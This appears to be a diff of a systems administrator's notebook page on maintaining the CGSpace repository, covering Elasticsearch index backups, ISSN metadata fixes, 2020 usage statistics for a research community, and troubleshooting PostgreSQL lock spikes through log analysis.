                                                                                                                                                                                                                        $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}' 
                                                                                                                                                                                                                        +{"acknowledged":true}%
                                                                                                                                                                                                                        +$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-backup
                                                                                                                                                                                                                        +{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final-backup"}%
                                                                                                                                                                                                                        +$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                        +
                                                                                                                                                                                                                        • Then start a harvesting on AReS Explorer
                                                                                                                                                                                                                        • Help Enrico get some 2020 statistics for the Roots, Tubers and Bananas (RTB) community on CGSpace
                                                                                                                                                                                                                            @@ -181,8 +181,8 @@ $ curl -X PUT "localhost:9200/openrxv-items-fina
                                                                                                                                                                                                                        -
                                                                                                                                                                                                                        $ ./ilri/fix-metadata-values.py -i /tmp/2021-04-01-ISSNs.csv -db dspace -u dspace -p 'fuuu' -f cg.issn -t 'correct' -m 253
                                                                                                                                                                                                                        -
                                                                                                                                                                                                                          +
                                                                                                                                                                                                                          $ ./ilri/fix-metadata-values.py -i /tmp/2021-04-01-ISSNs.csv -db dspace -u dspace -p 'fuuu' -f cg.issn -t 'correct' -m 253
                                                                                                                                                                                                                          +
                                                                                                                                                                                                                          • For now I only fixed obvious errors like “1234-5678.” and “e-ISSN: 1234-5678” etc, but there are still lots of invalid ones which need more manual work:
                                                                                                                                                                                                                            • Too few characters
                                                                                                                                                                                                                            • @@ -196,19 +196,19 @@ $ curl -X PUT "localhost:9200/openrxv-items-fina
                                                                                                                                                                                                                              • The AReS Explorer harvesting from yesterday finished, and the results look OK, but actually the Elasticsearch indexes are messed up again:
                                                                                                                                                                                                                              -
                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                              -    "openrxv-items-final": {
                                                                                                                                                                                                                              -        "aliases": {}
                                                                                                                                                                                                                              -    },
                                                                                                                                                                                                                              -    "openrxv-items-temp": {
                                                                                                                                                                                                                              -        "aliases": {
                                                                                                                                                                                                                              -            "openrxv-items": {}
                                                                                                                                                                                                                              -        }
                                                                                                                                                                                                                              -    },
                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                +    "openrxv-items-final": {
                                                                                                                                                                                                                                +        "aliases": {}
                                                                                                                                                                                                                                +    },
                                                                                                                                                                                                                                +    "openrxv-items-temp": {
                                                                                                                                                                                                                                +        "aliases": {
                                                                                                                                                                                                                                +            "openrxv-items": {}
                                                                                                                                                                                                                                +        }
                                                                                                                                                                                                                                +    },
                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                • openrxv-items should be an alias of openrxv-items-final, not openrxv-temp… I will have to fix that manually
                                                                                                                                                                                                                                • Enrico asked for more information on the RTB stats I gave him yesterday
                                                                                                                                                                                                                                    @@ -218,16 +218,16 @@ $ curl -X PUT "localhost:9200/openrxv-items-fina
                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                $ ~/dspace63/bin/dspace metadata-export -i 10568/80100 -f /tmp/rtb.csv
                                                                                                                                                                                                                                -$ csvcut -c 'id,dcterms.issued,dcterms.issued[],dcterms.issued[en_US]' /tmp/rtb.csv | \
                                                                                                                                                                                                                                -  sed '1d' | \
                                                                                                                                                                                                                                -  csvsql --no-header --no-inference --query 'SELECT a AS id,COALESCE(b, "")||COALESCE(c, "")||COALESCE(d, "") AS issued FROM stdin' | \
                                                                                                                                                                                                                                -  csvgrep -c issued -m 2020 | \
                                                                                                                                                                                                                                -  csvcut -c id | \
                                                                                                                                                                                                                                -  sed '1d' | \
                                                                                                                                                                                                                                -  sort | \
                                                                                                                                                                                                                                -  uniq
                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                  $ ~/dspace63/bin/dspace metadata-export -i 10568/80100 -f /tmp/rtb.csv
                                                                                                                                                                                                                                  +$ csvcut -c 'id,dcterms.issued,dcterms.issued[],dcterms.issued[en_US]' /tmp/rtb.csv | \
                                                                                                                                                                                                                                  +  sed '1d' | \
                                                                                                                                                                                                                                  +  csvsql --no-header --no-inference --query 'SELECT a AS id,COALESCE(b, "")||COALESCE(c, "")||COALESCE(d, "") AS issued FROM stdin' | \
                                                                                                                                                                                                                                  +  csvgrep -c issued -m 2020 | \
                                                                                                                                                                                                                                  +  csvcut -c id | \
                                                                                                                                                                                                                                  +  sed '1d' | \
                                                                                                                                                                                                                                  +  sort | \
                                                                                                                                                                                                                                  +  uniq
                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                  • So I remember in the future, this basically does the following:
                                                                                                                                                                                                                                    • Use csvcut to extract the id and all date issued columns from the CSV
                                                                                                                                                                                                                                    • @@ -242,32 +242,32 @@ $ csvcut -c 'id,dcterms.issued,dcterms.issued[],
                                                                                                                                                                                                                                    • Then I have a list of 296 IDs for RTB items issued in 2020
                                                                                                                                                                                                                                    • I constructed a JSON file to post to the DSpace Statistics API:
                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                    -  "limit": 100,
                                                                                                                                                                                                                                    -  "page": 0,
                                                                                                                                                                                                                                    -  "dateFrom": "2020-01-01T00:00:00Z",
                                                                                                                                                                                                                                    -  "dateTo": "2020-12-31T00:00:00Z",
                                                                                                                                                                                                                                    -  "items": [
                                                                                                                                                                                                                                    -"00358715-b70c-4fdd-aa55-730e05ba739e",
                                                                                                                                                                                                                                    -"004b54bb-f16f-4cec-9fbc-ab6c6345c43d",
                                                                                                                                                                                                                                    -"02fb7630-d71a-449e-b65d-32b4ea7d6904",
                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                    -  ]
                                                                                                                                                                                                                                    -}
                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                      +  "limit": 100,
                                                                                                                                                                                                                                      +  "page": 0,
                                                                                                                                                                                                                                      +  "dateFrom": "2020-01-01T00:00:00Z",
                                                                                                                                                                                                                                      +  "dateTo": "2020-12-31T00:00:00Z",
                                                                                                                                                                                                                                      +  "items": [
                                                                                                                                                                                                                                      +"00358715-b70c-4fdd-aa55-730e05ba739e",
                                                                                                                                                                                                                                      +"004b54bb-f16f-4cec-9fbc-ab6c6345c43d",
                                                                                                                                                                                                                                      +"02fb7630-d71a-449e-b65d-32b4ea7d6904",
                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                      +  ]
                                                                                                                                                                                                                                      +}
                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                      • Then I submitted the file three times (changing the page parameter):
                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                      $ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page1.json
                                                                                                                                                                                                                                      -$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page2.json
                                                                                                                                                                                                                                      -$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page3.json
                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                        $ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page1.json
                                                                                                                                                                                                                                        +$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page2.json
                                                                                                                                                                                                                                        +$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page3.json
                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                        • Then I extracted the views and downloads in the most ridiculous way:
                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                        $ grep views /tmp/page*.json | grep -o -E '[0-9]+$' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
                                                                                                                                                                                                                                        -30364
                                                                                                                                                                                                                                        -$ grep downloads /tmp/page*.json | grep -o -E '[0-9]+,' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
                                                                                                                                                                                                                                        -9100
                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                          $ grep views /tmp/page*.json | grep -o -E '[0-9]+$' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
                                                                                                                                                                                                                                          +30364
                                                                                                                                                                                                                                          +$ grep downloads /tmp/page*.json | grep -o -E '[0-9]+,' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
                                                                                                                                                                                                                                          +9100
                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                          • For curiousity I did the same exercise for items issued in 2019 and got the following:
                                                                                                                                                                                                                                            • Views: 30721
                                                                                                                                                                                                                                            • @@ -290,17 +290,17 @@ $ grep downloads /tmp/page*.json | grep -o -E '[
                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                          $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                          -12413
                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                            $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                            +12413
                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                            • The system journal shows thousands of these messages in the system journal, this is the first one:
                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                            Apr 06 07:52:13 linode18 tomcat7[556]: Apr 06, 2021 7:52:13 AM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                              Apr 06 07:52:13 linode18 tomcat7[556]: Apr 06, 2021 7:52:13 AM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                              • Around that time in the dspace log I see nothing unusual, but maybe these?
                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                              2021-04-06 07:52:29,409 INFO  com.atmire.dspace.cua.CUASolrLoggerServiceImpl @ Updating : 200/127 docs in http://localhost:8081/solr/statistics
                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                2021-04-06 07:52:29,409 INFO  com.atmire.dspace.cua.CUASolrLoggerServiceImpl @ Updating : 200/127 docs in http://localhost:8081/solr/statistics
                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                • (BTW what is the deal with the “200/127”? I should send a comment to Atmire) -
                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                  -3640
                                                                                                                                                                                                                                                  -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                  -2968
                                                                                                                                                                                                                                                  -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                  -13
                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                    +3640
                                                                                                                                                                                                                                                    +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                    +2968
                                                                                                                                                                                                                                                    +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                    +13
                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                    • After ten minutes or so it went back down…
                                                                                                                                                                                                                                                    • And now it’s back up in the thousands… I am seeing a lot of stuff in dspace log like this:
                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                    2021-04-06 11:59:34,364 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717951
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717952
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717953
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717954
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717955
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717956
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717957
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717958
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717959
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717960
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717961
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717962
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717963
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717964
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717965
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717966
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717967
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717968
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717969
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717970
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717971
                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                      2021-04-06 11:59:34,364 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717951
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717952
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717953
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717954
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717955
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717956
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717957
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717958
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717959
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717960
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717961
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717962
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717963
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717964
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717965
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717966
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717967
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717968
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717969
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717970
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717971
                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                      • I sent some notes and a log to Atmire on our existing issue about the database stuff
                                                                                                                                                                                                                                                        • Also I asked them about the possibility of doing a formal review of Hibernate
                                                                                                                                                                                                                                                        • @@ -354,65 +354,65 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                        • I had a meeting with Peter and Abenet about CGSpace TODOs
                                                                                                                                                                                                                                                        • CGSpace went down again and the PostgreSQL locks are through the roof:
                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                        $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                        -12154
                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                          $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                          +12154
                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                          • I don’t see any activity on REST API, but in the last four hours there have been 3,500 DSpace sessions:
                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                          # grep -a -E '2021-04-06 (13|14|15|16|17):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                          -3547
                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                            # grep -a -E '2021-04-06 (13|14|15|16|17):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                            +3547
                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                            • I looked at the same time of day for the past few weeks and it seems to be a normal number of sessions:
                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                            # for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do grep -a -E "2021-0(3|4)-[0-9]{2} (13|14|15|16|17):" "$file" | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                            -...
                                                                                                                                                                                                                                                            -3572
                                                                                                                                                                                                                                                            -4085
                                                                                                                                                                                                                                                            -3476
                                                                                                                                                                                                                                                            -3128
                                                                                                                                                                                                                                                            -2949
                                                                                                                                                                                                                                                            -2016
                                                                                                                                                                                                                                                            -1839
                                                                                                                                                                                                                                                            -4513
                                                                                                                                                                                                                                                            -3463
                                                                                                                                                                                                                                                            -4425
                                                                                                                                                                                                                                                            -3328
                                                                                                                                                                                                                                                            -2783
                                                                                                                                                                                                                                                            -3898
                                                                                                                                                                                                                                                            -3848
                                                                                                                                                                                                                                                            -7799
                                                                                                                                                                                                                                                            -255
                                                                                                                                                                                                                                                            -534
                                                                                                                                                                                                                                                            -2755
                                                                                                                                                                                                                                                            -599
                                                                                                                                                                                                                                                            -4463
                                                                                                                                                                                                                                                            -3547
                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                              # for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do grep -a -E "2021-0(3|4)-[0-9]{2} (13|14|15|16|17):" "$file" | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                              +3572
                                                                                                                                                                                                                                                              +4085
                                                                                                                                                                                                                                                              +3476
                                                                                                                                                                                                                                                              +3128
                                                                                                                                                                                                                                                              +2949
                                                                                                                                                                                                                                                              +2016
                                                                                                                                                                                                                                                              +1839
                                                                                                                                                                                                                                                              +4513
                                                                                                                                                                                                                                                              +3463
                                                                                                                                                                                                                                                              +4425
                                                                                                                                                                                                                                                              +3328
                                                                                                                                                                                                                                                              +2783
                                                                                                                                                                                                                                                              +3898
                                                                                                                                                                                                                                                              +3848
                                                                                                                                                                                                                                                              +7799
                                                                                                                                                                                                                                                              +255
                                                                                                                                                                                                                                                              +534
                                                                                                                                                                                                                                                              +2755
                                                                                                                                                                                                                                                              +599
                                                                                                                                                                                                                                                              +4463
                                                                                                                                                                                                                                                              +3547
                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                              • What about total number of sessions per day?
                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                              # for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do echo "$file:"; grep -a -o -E 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-03-28:
                                                                                                                                                                                                                                                              -11784
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-03-29:
                                                                                                                                                                                                                                                              -15104
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-03-30:
                                                                                                                                                                                                                                                              -19396
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-03-31:
                                                                                                                                                                                                                                                              -32612
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-01:
                                                                                                                                                                                                                                                              -26037
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-02:
                                                                                                                                                                                                                                                              -14315
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-03:
                                                                                                                                                                                                                                                              -12530
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-04:
                                                                                                                                                                                                                                                              -13138
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-05:
                                                                                                                                                                                                                                                              -16756
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-06:
                                                                                                                                                                                                                                                              -12343
                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                # for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do echo "$file:"; grep -a -o -E 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-03-28:
                                                                                                                                                                                                                                                                +11784
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-03-29:
                                                                                                                                                                                                                                                                +15104
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-03-30:
                                                                                                                                                                                                                                                                +19396
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-03-31:
                                                                                                                                                                                                                                                                +32612
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-01:
                                                                                                                                                                                                                                                                +26037
